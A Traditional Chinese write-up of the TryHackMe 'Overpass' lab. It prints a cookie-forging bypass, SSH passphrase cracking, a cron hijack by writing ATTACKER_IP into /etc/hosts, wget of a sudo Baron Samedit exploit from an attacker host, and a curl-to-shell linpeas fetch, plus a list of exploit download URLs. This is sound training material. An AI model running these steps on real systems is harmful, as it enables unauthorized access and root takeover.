TryHackMe Overpass writeup (zh-TW)
題目資訊
- 平台: TryHackMe
- 房間名稱: Overpass
- 難度: Easy
- 目標: 獲取 user.txt 和 root.txt
- 連結: https://tryhackme.com/room/overpass
發現服務:
- Port 22: SSH
- Port 80: HTTP
Step 2: Web 目錄枚舉
└─$ gobuster dir -u http://10.10.x.x -w /usr/share/seclists/Discovery/Web-Content/common.txt發現 /admin 目錄
Step 3: Authentication Bypass
檢查 /admin 頁面的 JavaScript:
- 發現
login.js存在邏輯漏洞
async function login() {
const usernameBox = document.querySelector("#username");
const passwordBox = document.querySelector("#password");
const loginStatus = document.querySelector("#loginStatus");
loginStatus.textContent = ""
const creds = { username: usernameBox.value, password: passwordBox.value }
const response = await postData("/api/login", creds)
const statusOrCookie = await response.text()
if (statusOrCookie === "Incorrect credentials") {
loginStatus.textContent = "Incorrect Credentials"
passwordBox.value=""
} else {
Cookies.set("SessionToken",statusOrCookie)
window.location = "/admin"
}
}- 只要有 SessionToken cookie 就能進入
Exploit:
document.cookie = "SessionToken=anything"
// 刷新頁面 F5
Step 4: SSH Key 破解
獲得加密的 SSH 私鑰:
ssh2john id_rsa > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
passphrase: james13
Step 5: User Flag
連進去之後會要求輸入上面的passphrase,輸入即可進去
ssh -i id_rsa [email protected]
cat user.txt
Step 6: 權限提升 - 方法 1 (Cron Job)
發現 cron job:
cat /etc/crontab
# * * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
利用 /etc/hosts 可寫:
echo "ATTACKER_IP overpass.thm" >> /etc/hosts
設置惡意腳本並等待 root shell,這個方法可以參照別人的writeup,詳細原因說明如最下面的經驗分享
Step 6: 權限提升 - 方法 2 (CVE-2021-3156)
# 檢查 sudo 版本
sudo --version
# 下載並編譯 exploit
wget http://ATTACKER_IP:8000/CVE-2021-3156.tar.gz
tar -xf CVE-2021-3156.tar.gz
cd CVE-2021-3156-main
make
./sudo-hax-me-a-sandwich 0
Step 7: Root Flag
whoami # root
cat /root/root.txt
技術要點
漏洞總結
- Authentication Bypass
- 客戶端驗證邏輯缺陷
- Cookie 驗證不當
- Cron Job 配置不當
- 使用域名而非 IP
- /etc/hosts 檔案權限過寬
- CVE-2021-3156 (Baron Samedit)
- Sudo 堆緩衝區溢出漏洞
經驗分享
關於如何找到 CVE-2021-3156 漏洞:
使用 Linpeas 自動枚舉,Linpeas 會自動檢查系統的 sudo 版本並提示已知漏洞:
curl http://10.6.4.21:8000/linpeas.sh | sh
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
[+] [CVE-2017-0358] ntfs-3g-modprobe
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Exposure: less probable
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.所以我們就可以利用掃描出來的方法 2 (CVE-2021-3156)
關於Step 6
這邊提供兩種提權方法,第一種方法我自己不可行,因為我是用wsl kali linux,網路部分有限制,所以無法用wsl kali linux拿到反向shell,一般常見解決辦法可以用windows powershell支援的netcat拿reverse shell,但最麻煩的是這題的提權辦法,他會去讀/downloads/src/buildscript.sh這個特定路徑的特定檔案,而windows要做到在那個特定路徑創建特定檔案,這件事有難度,所以我就利用第二個提權方法。